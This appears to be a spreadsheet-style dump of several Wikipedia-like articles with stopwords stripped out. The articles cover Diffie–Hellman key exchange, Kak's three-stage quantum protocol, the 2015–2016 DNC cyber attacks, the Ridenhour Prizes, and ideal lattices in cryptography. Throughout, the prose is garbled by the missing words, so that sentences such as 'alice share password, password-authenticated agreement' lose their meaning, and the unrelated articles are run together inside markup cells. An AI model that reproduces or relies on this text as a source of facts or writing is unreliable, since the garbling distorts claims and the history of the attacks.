when alice share password, password-authenticated agreement (pk) form diffie–hellman prevent man-in-the-middle attacks. simple scheme compare hash concatenated password calculated independently ends channel. feature schemes attacker test specific password iteration party, system provides good security relatively weak passwords. this approach described itu-t recommendation x.1035, used g.hn home networking standard. example protocol secure remote password protocol. public also possible diffie–hellman part public infrastructure, allowing encrypt message alice able decrypt prior communication trusted knowledge alice's public key. alice's public {\displaystyle (g^{a}{\bmod {p}},g,p)} send message, chooses random sends alice {\displaystyle g^{b}{\bmod {p}}} (unencrypted) together message encrypted symmetric {\displaystyle (g^{a})^{b}{\bmod {p}}} only alice determine symmetric hence decrypt message (the private key). pre-shared public also prevents man-in-the-middle attacks. practice, diffie–hellman used way, dominant public algorithm. this largely historical commercial reasons, namely security created certificate authority signing became verisign. diffie–hellman, elaborated above, cannot directly used sign certificates. however, elgamal signature algorithms mathematically related well mqv, component ipsec protocol suite securing internet protocol communications. also elliptic-curve diffie–hellman exchange supersingular isogeny exchange forward secrecy notes references general references gollman, dieter (2011). computer security (2nd ed.). west sussex, england: john wiley sons, ltd. isbn 978-0470741153. williamson, malcolm (january 1974). non-secret encryption using finite field (pdf) (technical report). communications electronics security group. retrieved 2017-03-22. williamson, malcolm (august 1976). thoughts cheaper non-secret encryption (pdf) (technical report). communications electronics security group. retrieved 2015-08-25. history non-secret encryption ellis 1987 (28k file) (html version) first years public-key cryptography whitfield diffie, proceedings ieee, vol. 1988, 560–577 (1.9mb file) menezes, alfred; oorschot, paul; vanstone, scott (1997). handbook applied cryptography boca raton, florida: press. isbn 0-8493-8523-7. (available online) singh, simon (1999) code book: evolution secrecy mary queen scots quantum cryptography york: doubleday isbn 0-385-49531-5 overview public cryptography martin hellman, ieee communications magazine, 2002, 42–49. (123kb file) external links oral history interview martin hellman, charles babbage institute, university minnesota. leading cryptography scholar martin hellman discusses circumstances fundamental insights invention public cryptography collaborators whitfield diffie ralph merkle stanford university mid-1970s. 2631 diffie–hellman agreement method. rescorla. june 1999. 3526 more modular exponential (modp) diffie–hellman groups internet exchange (ike). kivinen, kojo, communications security. 2003. summary ansi x9.42: agreement symmetric keys using discrete logarithm cryptography (64k file) (description ansi standards) talk martin hellman 2007, youtube video crypto dream team diffie hellman wins 2015 turing award (a.k.a. "nobel prize computing") diffie–hellman demo written python3 this demo properly supports very-large data enforces prime numbers required.</t>
  </si>
  <si>
    <t>Three-stage quantum cryptography protocol</t>
  </si>
  <si>
    <t>three-stage quantum cryptography protocol, also known kak's three-stage protocol method data encryption uses random polarization rotations alice bob, authenticated parties, proposed subhash kak. principle, method used continuous, unbreakable encryption data single photons used. different methods (quantum distribution) used direct encryption data, although could also used exchanging keys. basic idea behind method sending secrets valuables) unreliable courier alice place locks containing secret, also called double-lock cryptography. alice locks secret transported bob, sends back affixing lock. alice removes lock (after checking tampered with) sends back who, similarly unlocks lock obtains secret. braided form, one-pass suffices alice share initial key.this protocol proposed method secure communication entirely quantum unlike quantum distribution cryptographic transformation uses classical algorithmsthe basic polarization rotation scheme implemented hardware pramode verma quantum optics laboratory university oklahoma. method photon used exchange alice and, therefore, opens possibility multi-photon quantum cryptography. this works long number photons siphoned eavesdropper sufficient determine polarization angles. version deal man-in-the-middle attack also advanced.parakh analyzed three-stage protocol rotational quantum errors proposed modification would correct errors. interesting feature modified protocol invariant value rotational error therefore correct arbitrary rotations. also three-pass protocol references</t>
  </si>
  <si>
    <t>Democratic National Committee cyber attacks</t>
  </si>
  <si>
    <t>democratic national committee cyber attacks took place 2015 2016, groups russian computer hackers infiltrated democratic national committee (dnc) computer network, leading data breach. cybersecurity experts, well u.s. government, determined cyberespionage work russian intelligence agencies. forensic evidence analyzed several cybersecurity firms, crowdstrike, fidelis, mandiant fireeye), strongly indicates russian intelligence agencies separately infiltrated computer systems. american cybersecurity firm crowdstrike, removed hacking programs, revealed history encounters groups already named them, calling cozy bear fancy bear, names used media.on december 2016, told u.s. legislators u.s. intelligence community concluded russia conducted cyberattacks operations 2016 u.s. election assist donald trump winning presidency. multiple u.s. intelligence agencies concluded specific individuals tied russian government provided wikileaks stolen emails dnc, well stolen emails hillary clinton's campaign chairman, also target cyberattack. these intelligence organizations additionally concluded russia hacked republican national committee (r.n.c.) well d.n.c., chose leak information obtained r.n.c. cyber attacks responsibility cyber attacks successfully penetrated computing system began 2015. attacks "cozy bear" began summer 2015. attacks "fancy bear" began april 2016. "fancy bear" group began activities compromised system became apparent. groups presumed spying communications, stealing opposition research donald trump, well reading email chats. both finally identified crowdstrike 2016. both groups intruders successfully expelled systems within hours detection. these attacks considered part group recent attacks targeting u.s. government departments several political organizations, including 2016 campaign organizations.on july 2016, person entity going moniker "guccifer 2.0" claimed wordpress-hosted blog acting alone hacking dnc. also claimed send significant amounts stolen electronic documents wikileaks. wikileaks revealed source leaked emails. however, cybersecurity experts firms, including crowdstrike, fidelis cybersecurity, mandiant, secureworks, threatconnect, editor technica, rejected claims "guccifer 2.0" determined, basis substantial evidence, cyberattacks committed russian state-sponsored groups (cozy bear fancy bear).according separate reports york times washington post, u.s. intelligence agencies concluded "high confidence" russian government behind theft emails documents dnc. while u.s. intelligence community concluded russia behind cyberattack, intelligence officials told washington post "not reached conclusion passed emails wikileaks" know "whether russian officials directed leak." number experts cybersecurity analysts believe "guccifer 2.0" probably russian government disinformation cover story distract attention away breach russian intelligence agencies.president obama russian president vladimir putin discussion computer security issues, took place side segment then-ongoing summit china september 2016. obama said russian hacking stopped warning putin.in joint statement october 2016, united states department homeland security office director national intelligence stated intelligence community confident russian government directed breaches release obtained material attempt interfere election process." background common among russian intelligence services, groups used similar hacking tools strategies. believed neither group aware other. although antithetical american computer intelligence methods, fear undermining defeating intelligence operations other, common practice russian intelligence community since 2004.this intrusion part several attacks attempting access information american political organizations, including 2016 u.s. presidential campaigns. both "cozy bear" "fancy bear" known adversaries, extensively engaged political economic espionage benefits russian federation government. both believed connected russian intelligence services. also, access resources demonstrate levels proficiency matching nation-state capabilities. "cozy bear" past year infiltrated unclassified computer systems white house, u.s. state department, u.s. joint chiefs staff. according crowdstrike, targeted sectors include: defense, energy, mining, financial, insurance, legal, manufacturing, media, think tanks, pharmaceutical, research technology industries well universities. "cozy bear" observed attacks occurred western europe, brazil, china, japan, mexico, zealand, south korea, turkey central asia."fancy bear" operating since mid-2000s. crowdstrike reported targeting included aerospace, defense, energy, government media industries. "fancy bear" intrusions occurred united states, western europe, brazil, canada, china, republic georgia, iran, japan, malaysia south korea. targeted defense ministries military organizations parallel russian federation government interests. this indicate affiliation main intelligence directorate (gru, russian military intelligence service). specifically, "fancy bear" linked intrusions german bundestag france's monde (television station) april 2015. secureworks, cybersecurity firm headquartered united states, concluded march 2015 2016, "fancy bear" target list included merely dnc, tens thousands foes putin kremlin united states, ukraine, russia, georgia, syria. only handful republicans targeted, however. hacking january 2018 dutch newspaper volkskrant program nieuwsuur reported 2014 dutch intelligence agency general intelligence security service (aivd) successfully infiltrated computers cozy bear observed hacking head office state department subsequently white house first alert national security agency cyber-intrusion.in early 2015, apprised agencies intrusions dutch secretly detected august 2015, washington field office first alerted technical staff compromise systems. much later, lack higher level communications political party government seen former "unfathomable lapse" april 2016 legal authorizations share sensitive technical data government finally apprised leaders systems penetrated.cozy bear" access systems since summer 2015; "fancy bear", since april 2016. there evidence collaboration knowledge other's presence within system. rather, "two russian espionage groups compromised systems engaged separately theft identical credentials". "cozy bear" employed "sea daddy" implant obfuscated powershell script backdoor, launching malicious code various times various systems. "fancy bear" employed agent malware, enabled distant command execution, transmissions files keylogging, well "x-tunnel" malware. leaders became aware compromise april 2016. these attacks broadly reflect russian government interest u.s. political system, well political leaders' policies, tendencies proclivities assessing possible beneficial outcomes. attacks also broadly reflect russian government interest strategies, policies, practices u.s. government. this also globally reflects foreign governments' interest ascertaining information donald trump entry u.s. political leadership roles, contrast information likely garnered decades pertaining clintons.the commissioned cybersecurity company crowdstrike defeat intrusions. chief technology officer, dmitri alperovitch, also cybersecurity expert, stated: crowdstrike stands fully analysis findings identifying separate russian intelligence-affiliated adversaries present network 2016[...] we've lots experience actors attempting target customers past know well. fact, team considers best adversaries numerous nation-state, criminal hacktivist/terrorist groups encounter daily basis. their tradecraft superb, operational security second none extensive usage 'living-off-the-land' techniques enables easily bypass many security solutions encounter. other cybersecurity firms, fidelis cybersecurity fireeye, independently reviewed malware came conclusion crowdstrike—that expert russian hacking groups responsible breach. november 2017, authorities identified russian individuals conducted hack. beginning december 2016 russian government arrested sergei mikhailov, high ranking government cyber-spy, ruslan stoyanov, private sector cyber-security expert, georgy fomchenkov, former government cyber-spy, dmitry dokuchaev, mikhailov associate charged aiding u.s. intelligence agencies york times associated hacking. donor information although claimed personal, financial, donor information accessed, "guccifer 2.0" leaked claimed donor lists detailing campaign contributions gawker smoking gun. however, information authenticated, doubts remain guccifer 2.0's backstory. guccifer june 2016, person person(s) claimed hacker hacked servers published stolen documents online. "guccifer 2.0" later also claimed leaked 20.000 emails wikileaks. u.s. intelligence conclusions u.s. intelligence community tasked resources debating putin chose summer 2016 escalate active measures influencing u.s. politics. director national intelligence james clapper said 2011–13 russian protests putin's confidence viability politician damaged, putin responded propaganda operation. former officer patrick skinner explained goal spread uncertainty. u.s. congressman adam schiff, ranking member house permanent select committee intelligence, commented putin's aims, said u.s. intelligence agencies concerned russian propaganda. speaking disinformation appeared hungary, slovakia, czech republic, poland, schiff said increase behavior u.s. schiff concluded russian propaganda operations would continue u.s. election.on december 2016, told u.s. legislators u.s. intelligence community concluded russia conducted operations 2016 u.s. election assist donald trump winning presidency. multiple intelligence agencies concluded people specific individuals tied russian government gave wikileaks hacked emails democratic national committee (d.n.c.) additional sources john podesta, campaign chairman hillary clinton. these intelligence organizations additionally concluded russia hacked republican national committee (r.n.c.) well d.n.c.—and chose leak information obtained r.n.c. said foreign intelligence agents russian operatives previously known u.s. officials told u.s. senators "quite clear" russia's intentions help trump. trump released statement december disregarded conclusions. involvement senior enforcement official told cnn: repeatedly stressed officials necessity obtaining direct access servers data, rebuffed well initial compromise mitigated...these actions caused significant delays inhibited addressing intrusion earlier. therefore rely assessment crowdstrike instead, hired investigate cyber attacks. u.s. legislative response members u.s. senate intelligence committee traveled ukraine poland 2016 learned russian operations influence affairs. u.s. senator angus king told portland press herald tactics used russia 2016 u.s. election analogous used countries. november 2016, king joined letter seven members u.s. senate intelligence committee asked president obama publicize information intelligence community russia's role u.s. election. interview cnn, king warned ignoring problem, saying bipartisan issue.representatives u.s. congress took action monitor national security united states advancing legislation monitor propaganda. november 2016, legislators approved measure within national defense authorization u.s. state department propaganda inter-agency panel. legislation authorized funding $160 million two-year-period. initiative developed bipartisan bill, countering foreign propaganda disinformation act, written u.s. senators portman (republican) chris murphy (democrat). portman urged u.s. government action counter propaganda. murphy said election apparent u.s. needed additional tactics fight russian propaganda. u.s. senate intelligence committee member wyden said frustration covert russian propaganda bipartisan.republican u.s. senators stated planned hold hearings investigate russian influence 2016 u.s. elections. went preference incoming republican president-elect donald trump, downplayed potential russian meddling election. u.s. senate armed services committee chairman john mccain u.s. senate intelligence committee chairman richard burr discussed plans collaboration investigations russian cyberwarfare election. u.s. senate foreign relations committee chairman corker planned 2017 investigation. senator lindsey graham indicated would conduct sweeping investigation 115th congress. president obama order december 2016, president obama ordered entire united states intelligence community conduct investigation russia's attempts influence 2016 u.s. election provide report left office january 2017. lisa monaco, u.s. homeland security advisor chief counterterrorism advisor president, announced study, said intrusion foreign nation u.s. national election unprecedented event would necessitate investigation subsequent administrations executive branch. intelligence analysis take account data last three presidential elections u.s. evidence showed malicious cyberwarfare 2008 2016 u.s. elections. also references external links timeline hacks publications glomar disclosure</t>
  </si>
  <si>
    <t>The Ridenhour Prizes</t>
  </si>
  <si>
    <t>ridenhour prizes awards four categories given annually recognition "who persevere acts truth-telling protect public interest, promote social justice illuminate vision society". awards presented nation institute fertel foundation recognition ridenhour, vietnam veteran exposed massacre. each prize carries $10,000 stipend. prizes first awarded 2004. prize categories ridenhour courage prize ridenhour book prize ridenhour truth-telling prize ridenhour documentary film prize (since 2011) past winners ridenhour courage prize 2004: daniel ellsberg 2005: seymour hersh 2006: gloria steinem 2007: jimmy carter 2008: bill moyers 2009: herbert 2010: howard zinn (posthumous) 2011: russ feingold 2012: john lewis 2013: james hansen 2014: frederick a.o. schwarz, 2015: james risen 2016: jamie kalven 2017: anna deavere smith 2018: tarana burke 2019: george soros (donated prize money hungarian spectrum) 2020: denis hayes 2021: josé andrés ridenhour book prize 2004: deborah scroggins, emma's war: worker, radical islam, politics true story love death sudan 2005: adrian nicole leblanc, random family: love, drugs, trouble, coming bronx 2006: anthony shadid, night draws near: iraq's people shadow america's 2007: rajiv chandrasekaran, imperial life emerald city: inside iraq's green zone, 2008: james scurlock, maxed out: hard times easy credit 2009: jane mayer, dark side: inside story terror turned into american ideals 2010: sacco, footnotes gaza 2011: wendell potter, deadly spin: insurance company insider speaks corporate killing healthcare deceiving americans 2012: soufan, black banners: inside story 9/11 against al‐qaeda 2013: seth rosenfeld, subversives: fbi's student radicals, reagan's rise power 2014: sheri fink, five days memorial: life death storm-ravaged hospital 2015: anand gopal, good among living: america, taliban, through afghan eyes 2016: jill leovy, ghettoside: true story murder america 2017: heather thompson, blood water: attica prison uprising 1971 legacy 2018: lauren markham, away brothers: young migrants making american life 2019: eliza griswold, amity prosperity: family fracturing america 2020: chanel miller know name: memoir 2021: claudio saunt unworthy republic: dispossession native americans road indian territory ridenhour truth-telling prize 2004: joseph wilson 2005: kristen breitweiser 2006: rick piltz 2007: donald vance 2008: matthew diaz 2009: thomas tamm 2010: matthew 2011: thomas andrews drake 2012: eileen foster daniel davis 2013: jose antonio vargas 2014: edward snowden laura poitras 2015: aicha elbasri 2016: mona hanna-attisha 2017: daniela vargas 2018: carmen yulín cruz soto 2019: scott allen, pamela mcpherson, scott shuchart 2020: rick bright 2021: cariol horne ridenhour documentary film prize 2011: julia bacha, ronit avni rula salameh, budrus 2012: rachel libert tony hardmon, semper always faithful 2013: kirby dick ziering, invisible 2014: dawn porter, gideon's army 2015: laura poitras, citizenfour 2016: joshua oppenheimer, look silence 2017: sonia kennebeck, national bird 2018: piscatella, joshua: teenager superpower 2019: alexandria bombach, shoulders 2020: nanfu wang jialing zhang child nation 2021: ramona diaz thousand cuts special ridenhour prize reportorial distinction 2009: nick turse references external links ridenhour prizes official site fertel foundation site links sites related ridenhour</t>
  </si>
  <si>
    <t>Ideal lattice</t>
  </si>
  <si>
    <t>discrete mathematics, ideal lattices special class lattices generalization cyclic lattices. ideal lattices naturally occur many parts number theory, also areas. particular, significant place cryptography. micciancio defined generalization cyclic lattices ideal lattices. they used cryptosystems decrease square root number parameters necessary describe lattice, making efficient. ideal lattices concept, similar lattice classes used long time. example, cyclic lattices, special case ideal lattices, used ntruencrypt ntrusign. ideal lattices also form basis quantum computer attack resistant cryptography based ring learning errors. these cryptosystems provably secure assumption shortest vector problem (svp) hard ideal lattices. introduction general terms, ideal lattices lattices corresponding ideals rings form {\displaystyle \mathbb [x]/\langle f\rangle irreducible polynomial {\displaystyle degree {\displaystyle definitions ideal lattices prior work instances following general notion: {\displaystyle ring whose additive group isomorphic {\displaystyle \mathbb ^{n}} (i.e., free {\displaystyle \mathbb -module rank {\displaystyle {\displaystyle \sigma additive isomorphism mapping {\displaystyle lattice {\displaystyle \sigma (r)} {\displaystyle -dimensional real vector space (e.g., {\displaystyle \mathbb ^{n}} family ideal lattices ring {\displaystyle embedding {\displaystyle \sigma lattices {\displaystyle \sigma (i)} {\displaystyle ideal {\displaystyle definition notation {\displaystyle f\in \mathbb [x]} monic polynomial degree {\displaystyle consider quotient ring {\displaystyle \mathbb [x]/\langle f\rangle using standard representatives {\displaystyle \lbrace (g{\bmod {f}}):g\in \mathbb [x]\rbrace identification polynomials vectors, quotient ring {\displaystyle \mathbb [x]/\langle f\rangle isomorphic additive group) integer lattice {\displaystyle \mathbb ^{n}} ideal {\displaystyle i\subseteq \mathbb [x]/\langle f\rangle defines corresponding integer sublattice {\displaystyle {\mathcal {l}}(i)\subseteq \mathbb ^{n}} ideal lattice integer lattice {\displaystyle {\mathcal {l}}(b)\subseteq \mathbb ^{n}} {\displaystyle b=\lbrace g{\bmod {f}}:g\in i\rbrace monic polynomial {\displaystyle degree {\displaystyle ideal {\displaystyle i\subseteq \mathbb [x]/\langle f\rangle related properties turns relevant properties {\displaystyle resulting function collision resistant are: {\displaystyle irreducible. ring norm {\displaystyle \lvert g\rvert _{f}} much bigger {\displaystyle \lvert g\rvert _{\infty polynomial {\displaystyle quantitative sense.the first property implies every ideal ring {\displaystyle \mathbb [x]/\langle f\rangle defines full-rank lattice {\displaystyle \mathbb ^{n}} plays fundamental role proofs. lemma: every ideal {\displaystyle {\displaystyle \mathbb [x]/\langle f\rangle {\displaystyle monic, irreducible integer polynomial degree {\displaystyle isomorphic full-rank lattice {\displaystyle \mathbb ^{n}} ding lindner gave evidence distinguishing ideal lattices general ones done polynomial time showed practice randomly chosen lattices never ideal. they considered case lattice full rank, i.e. basis consists {\displaystyle linear independent vectors. this fundamental restriction lyubashevsky micciancio shown lattice ideal respect irreducible monic polynomial, full rank, given lemma. algorithm: identifying ideal lattices full rank bases data: full-rank basis {\displaystyle b\in \mathbb ^{(n,n)}} result: true {\displaystyle {\textbf {q}}} {\displaystyle spans ideal lattice respect {\displaystyle {\textbf {q}}} otherwise false. transform {\displaystyle calculate {\displaystyle a={\rm {adj}}(b)} {\displaystyle d=\det(b)} {\displaystyle z=b_{(n,n)}} calculate product {\displaystyle p=amb{\bmod {d}}} last column non-zero {\displaystyle c=p_{(\centerdot ,n)}} equal column else return false {\displaystyle z\mid c_{i}} {\displaystyle i=1,\ldots find {\displaystyle q^{\ast }\equiv (c/z){\bmod {(}}d/z)} {\displaystyle q^{\ast }\equiv 0{\bmod }}z} else return false {\displaystyle bq^{\ast }\equiv 0{\bmod {(}}d/z)} return true, {\displaystyle q=bq^{\ast }/d} else return falsewhere matrix {\displaystyle m={\begin{pmatrix}0&amp;\cdot &amp;\cdot &amp;\cdot &amp;0\\&amp;&amp;&amp;&amp;\cdot \\&amp;&amp;&amp;&amp;\cdot \\i_{n-1}&amp;&amp;&amp;&amp;\cdot \\&amp;&amp;&amp;&amp;0\end{pmatrix}}} using algorithm, seen many lattices ideal lattices. example, {\displaystyle n=2} {\displaystyle k\in \mathbb \smallsetminus \lbrace 0,\pm 1\rbrace {\displaystyle b_{1}={\begin{pmatrix}k&amp;0\\0&amp;1\end{pmatrix}}} ideal, {\displaystyle b_{2}={\begin{pmatrix}1&amp;0\\0&amp;k\end{pmatrix}}} not. {\displaystyle b_{2}} {\displaystyle k=2} example given lyubashevsky micciancio.performing algorithm referring basis matrix already hermite normal form first step needed. determinant {\displaystyle d=2} adjugate matrix {\displaystyle a={\begin{pmatrix}2&amp;0\\0&amp;1\end{pmatrix}},} {\displaystyle m={\begin{pmatrix}0&amp;0\\1&amp;0\end{pmatrix}}} finally, product {\displaystyle p=amb{\bmod {d}}} {\displaystyle p={\begin{pmatrix}0&amp;0\\1&amp;0\end{pmatrix}}.} point algorithm stops, last column {\displaystyle zero {\displaystyle would span ideal lattice. cryptography micciancio introduced class structured cyclic lattices, correspond ideals polynomial rings {\displaystyle \mathbb [x]/(x^{n}-1)} presented first provably secure one-way function based worst-case hardness restriction poly(n)-svp cyclic lattices. (the problem γ-svp consists computing non-zero vector given lattice, whose norm times larger norm shortest non-zero lattice vector.) time, thanks algebraic structure, one-way function enjoys high efficiency comparable ntru scheme {\displaystyle {\tilde {o}}(n)} evaluation time storage cost). subsequently, lyubashevsky micciancio independently peikert rosen showed modify micciancio's function construct efficient provably secure collision resistant hash function. this, introduced general class ideal lattices, correspond ideals polynomial rings {\displaystyle \mathbb [x]/f(x)} collision resistance relies hardness restriction poly(n)-svp ideal lattices (called poly(n)-ideal-svp). average-case collision-finding problem natural computational problem called ideal-sis, shown hard worst-case instances ideal-svp. provably secure efficient signature schemes ideal lattices also proposed, constructing efficient provably secure public encryption ideal lattices interesting open problem. fundamental idea using ring exchange proposed filed university cincinnati 2011 jintai ding provided state description quantum resistant exchange using ring lwe. paper appeared 2012 provisional patent application filed 2012. 2014, peikert presented transport scheme following basic idea ding's, idea sending additional signal rounding ding's construction also utilized. digital signature using concepts done several years earlier vadim lyubashevsky "lattice signatures without trapdoors." together, work peikert lyubashevsky provide suite ring-lwe based quantum attack resistant algorithms security reductions. efficient collision resistant hash functions main usefulness ideal lattices cryptography stems fact efficient practical collision resistant hash functions built based hardness finding approximate shortest vector lattices. independently constructed collision resistant hash functions peikert rosen, well lyubashevsky micciancio, based ideal lattices generalization cyclic lattices), provided fast practical implementation. these results paved efficient cryptographic constructions including identification schemes signatures. lyubashevsky micciancio gave constructions efficient collision resistant hash functions proven secure based worst case hardness shortest vector problem ideal lattices. they defined hash function families given ring {\displaystyle r=\mathbb _{p}[x]/\langle f\rangle {\displaystyle f\in \mathbb _{p}[x]} monic, irreducible polynomial degree {\displaystyle {\displaystyle integer order roughly {\displaystyle n^{2}} generate {\displaystyle random elements {\displaystyle a_{1},\dots ,a_{m}\in {\displaystyle constant. ordered {\displaystyle -tuple {\displaystyle h=(a_{1},\ldots ,a_{m})\in r^{m}} determines hash function. elements {\displaystyle d^{m}} {\displaystyle strategically chosen subset {\displaystyle {\displaystyle element {\displaystyle b=(b_{1},\ldots ,b_{m})\in d^{m}} hash {\displaystyle h(b)=\sum _{i=1}^{m}\alpha _{i}\centerdot b_{i}} here size (the hash function) {\displaystyle o(mn\log p)=o(n\log operation {\displaystyle \alpha _{i}\centerdot b_{i}} done time {\displaystyle o(n\log n\log \log using fast fourier transform (fft), appropriate choice polynomial {\displaystyle since {\displaystyle constant, hashing requires time {\displaystyle o(n\log n\log \log they proved hash function family collision resistant showing polynomial-time algorithm succeeds non-negligible probability finding {\displaystyle b\neq b'\in d^{m}} {\displaystyle h(b)=h(b')} randomly chosen hash function {\displaystyle h\in r^{m}} certain problem called “shortest vector problem” solvable polynomial time every ideal ring {\displaystyle \mathbb [x]/\langle f\rangle based work lyubashevsky micciancio 2006, micciancio regev defined following algorithm hash functions based ideal lattices: parameters: integers {\displaystyle q,n,m,d} {\displaystyle n\mid vector {\displaystyle \mathbb ^{n}} key: {\displaystyle m/n} vectors {\displaystyle a_{1},\ldots ,a_{m/n}} chosen independently uniformly random {\displaystyle \mathbb _{q}^{n}} hash function: {\displaystyle f_{a}:\lbrace 0,\ldots ,d-1\rbrace ^{m}\longrightarrow \mathbb _{q}^{n}} given {\displaystyle f_{a}(y)=[f\ast a_{1}|\ldots |f\ast a_{m/n}]y{\bmod }}q} .here {\displaystyle n,m,q,d} parameters, vector {\displaystyle \mathbb ^{n}} {\displaystyle block-matrix structured blocks {\displaystyle a^{(i)}=f\ast a^{(i)}} finding short vectors {\displaystyle \lambda _{q}^{\perp }([f\ast a_{1}|\ldots |f\ast a_{m/n}])} average (even inverse polynomial probability) hard solving various lattice problems (such approximate sivp) worst case ideal lattices, provided vector satisfies following properties: unit vectors vector [f∗u]v small (say, polynomial {\displaystyle typically {\displaystyle o({\sqrt {n}}))} norm. polynomial {\displaystyle f(x)=x^{n}+f_{n}x^{n-1}+\cdots +f_{1}\in \mathbb [x]} irreducible integers, i.e., factor product integer polynomials smaller degree.the first property satisfied vector {\displaystyle \mathbf =(-1,0,\ldots ,0)} corresponding circulant matrices, coordinates [f∗u]v bounded hence {\displaystyle \lvert [{\textbf {f}}\ast {\textbf {u}}]{\textbf {v}}\rvert \leq {\sqrt {n}}} however, polynomial {\displaystyle x^{n}-1} corresponding {\displaystyle \mathbf =(-1,0,\ldots ,0)} irreducible factors {\displaystyle (x-1)(x^{n-1}+x^{n-2}+\cdots +x+1)} collisions efficiently found. {\displaystyle \mathbf =(-1,0,\ldots ,0)} good choice collision resistant hash functions, many choices possible. example, choices properties satisfied (and therefore, result collision resistant hash functions worst-case security guarantees) {\displaystyle \mathbf =(1,\ldots ,1)\in \mathbb ^{n}} {\displaystyle n+1} prime, {\displaystyle \mathbf =(1,0,\ldots ,0)\in \mathbb ^{n}} {\displaystyle equal power digital signatures digital signatures schemes among important cryptographic primitives. they obtained using one-way functions based worst-case hardness lattice problems. however, impractical. number digital signature schemes based learning errors, ring learning errors trapdoor lattices developed since learning errors problem applied cryptographic context. their direct construction digital signatures based complexity approximating shortest vector ideal (e.g., cyclic) lattices. scheme lyubashevsky micciancio worst-case security guarantees based ideal lattices asymptotically efficient construction known date, yielding signature generation verification algorithms almost linear time.one main open problems raised work constructing one-time signature similar efficiency, based weaker hardness assumption. instance, would great provide one-time signature security based hardness approximating shortest vector problem (svp) ideal lattices) within factor {\displaystyle {\tilde {o}}(n)} .their construction based standard transformation one-time signatures (i.e. signatures allow securely sign single message) general signature schemes, together novel construction lattice based one-time signature whose security ultimately based worst-case hardness approximating shortest vector lattices corresponding ideals ring {\displaystyle \mathbb [x]/\langle f\rangle irreducible polynomial {\displaystyle key-generation algorithm: input: {\displaystyle 1^{n}} irreducible polynomial {\displaystyle f\in \mathbb degree {\displaystyle {\displaystyle p\longleftarrow (\varphi n)^{3}} {\displaystyle m\longleftarrow \lceil \log n\rceil {\displaystyle r\longleftarrow \mathbb _{p}[x]/\langle f\rangle positive {\displaystyle sets {\displaystyle dk_{i}} {\displaystyle dl_{i}} defined {\displaystyle dk_{i}=\lbrace {\hat {y}}\in r^{m}} {\displaystyle \lvert {\hat {y}}\rvert _{\infty }\leq 5ip^{1/m}\rbrace {\displaystyle dl_{i}=\lbrace {\hat {y}}\in r^{m}} {\displaystyle \lvert {\hat {y}}\rvert _{\infty }\leq 5in\varphi p^{1/m}\rbrace choose uniformly random {\displaystyle h\in {\mathcal {h}}_{r,m}} pick uniformly random string {\displaystyle r\in \lbrace 0,1\rbrace ^{\lfloor \log ^{2}n\rfloor {\displaystyle r=0^{\lfloor \log ^{2}n\rfloor {\displaystyle j=\lfloor \log ^{2}n\rfloor else {\displaystyle position first string {\displaystyle pick {\displaystyle {\hat {k}},{\hat {l}}} independently uniformly random {\displaystyle dk_{j}} {\displaystyle dl_{j}} respectively signing key: {\displaystyle ({\hat {k}},{\hat {l}})} verification key: {\displaystyle (h,h({\hat {k}}),h({\hat {l}}))} signing algorithm: input: message {\displaystyle z\in {\displaystyle \lvert z\rvert _{\infty }\leq signing {\displaystyle ({\hat {k}},{\hat {l}})} output: {\displaystyle {\hat {s}}\longleftarrow {\hat {k}}z+{\hat {l}}} verification algorithm: input: message {\displaystyle signature {\displaystyle {\hat {s}}} verification {\displaystyle (h,h({\hat {k}}),h({\hat {l}}))} output: “accept”, {\displaystyle \lvert {\hat {s}}\rvert _{\infty }\leq 10\varphi p^{1/m}n\log ^{2}n} {\displaystyle {\hat {s}}={\hat {k}}z+{\hat {l}}} “reject”, otherwise. swifft hash function hash function quite efficient computed asymptotically {\displaystyle {\tilde {o}}(m)} time using fast fourier transform (fft) complex numbers. however, practice, carries substantial overhead. swifft family hash functions defined micciancio regev essentially highly optimized variant hash function using (fft) {\displaystyle \mathbb _{q}} vector {\displaystyle (1,0,\dots ,0)\in \mathbb ^{n}} {\displaystyle equal power corresponding polynomial {\displaystyle x^{n}+1} irreducible. {\displaystyle prime number {\displaystyle divides {\displaystyle q-1} {\displaystyle {\textbf {w}}\in \mathbb _{q}^{n\times invertible matrix {\displaystyle \mathbb _{q}} chosen later. swifft hash function maps {\displaystyle {\tilde {a}}^{(1)},\ldots ,{\tilde {a}}^{(m/n)}} consisting {\displaystyle m/n} vectors chosen uniformly {\displaystyle \mathbb _{q}^{n}} input {\displaystyle y\in \lbrace 0,\ldots ,d-1\rbrace ^{m}} {\displaystyle {\textbf {w}}^{\centerdot }f_{a}(y){\bmod }}q} {\displaystyle {\textbf {a}}=[{\textbf {f}}\ast \alpha ^{(1)},\ldots ,{\textbf {f}}\ast \alpha ^{(m/n)}]} {\displaystyle \alpha ^{(i)}={\textbf {w}}^{-1}{\tilde {a}}^{(i)}{\bmod {q}}} multiplication invertible matrix {\displaystyle {\textbf {w}}^{-1}} maps uniformly chosen {\displaystyle {\tilde {a}}\in \mathbb _{q}^{n}} uniformly chosen {\displaystyle \alpha \mathbb _{q}^{n}} moreover, {\displaystyle {\textbf {w}}^{\centerdot }f_{a}(y)={\textbf {w}}^{\centerdot }f_{a}(y'){\pmod {q}}} {\displaystyle f_{a}(y)=f_{a}(y'){\pmod {q}}} together, facts establish finding collisions swifft equivalent finding collisions underlying ideal lattice function {\displaystyle f_{a}} claimed collision resistance property swifft supported connection worst case lattice problems ideal lattices. algorithm swifft hash function parameters: integers {\displaystyle n,m,q,d} {\displaystyle power {\displaystyle prime, {\displaystyle 2n\mid (q-1)} {\displaystyle n\mid key: {\displaystyle m/n} vectors {\displaystyle {\tilde {a}}_{1},\ldots ,{\tilde {a}}_{m/n}} chosen independently uniformly random {\displaystyle \mathbb _{q}^{n}} input: {\displaystyle m/n} vectors {\displaystyle y^{(1)},\dots ,y^{(m/n)}\in \lbrace 0,\dots ,d-1\rbrace ^{n}} output: vector {\displaystyle \sum _{i=1}^{m/n}{\tilde {a}}^{(i)}\odot ({\textbf {w}}y^{(i)})\in \mathbb _{q}^{n}} {\displaystyle \odot component-wise vector product. learning errors (lwe) ring-lwe learning errors (lwe) problem shown hard worst-case lattice problems served foundation many cryptographic applications. however, applications inefficient inherent quadratic overhead lwe. truly efficient applications, lyubashevsky, peikert regev defined appropriate version problem wide class rings proved hardness worst-case assumptions ideal lattices rings. they called version ring-lwe. {\displaystyle f(x)=x^{n}+1\in \mathbb [x]} security parameter {\displaystyle power making {\displaystyle f(x)} irreducible rationals. (this particular {\displaystyle f(x)} comes family cyclotomic polynomials, play special role work). {\displaystyle r=\mathbb 